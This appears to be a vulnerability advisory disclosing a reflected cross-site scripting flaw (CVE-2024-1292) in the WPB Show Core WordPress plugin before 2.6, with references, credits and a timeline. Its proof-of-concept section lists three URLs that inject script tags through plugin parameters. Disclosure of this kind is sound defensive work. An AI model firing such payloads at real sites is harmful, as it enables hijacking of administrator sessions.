WPB Show Core < 2.6 - Reflected XSS Description The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. Proof of Concept https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(133 https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(133 https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-[]-24%3Cscript%3Ealert Affects Plugins wpb-show-core (Fixed in 2.6) References CVE: CVE-2024-1292 Classification Type: XSS OWASP Top 10: A7: Cross-Site Scripting (XSS) CWE: CWE-79 CVSS: 7.1 (high) Miscellaneous Original Researcher: Aly Khaled Aly Abd Al-aal Submitter: Aly Khaled Aly Abd Al-aal Submitter Website: https://0x411y.github.io/ Submitter Twitter: Aly_Khal3d Verified: Yes WPVDB ID: 56d4fc48-d0dc-4ac6-93cd-f64d4c3c5c07 Timeline Publicly Published: 2024-03-18 Added: 2024-03-18 Last Updated: 2024-03-18 Other Related Vulnerabilities Coupon Affiliates < 5.4.6 - Reflected XSS (Published: 2023-04-13) Shortcode <= 0.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting (Published: 2025-09-22) Widget BUY.BOX <= 3.1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting (Published: 2025-02-18) WP Maps < 4.7.2 - Admin+ Stored XSS (Published: 2025-04-10) Ziteboard Online Whiteboard < 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via ziteboard Shortcode (Published: 2023-11-06)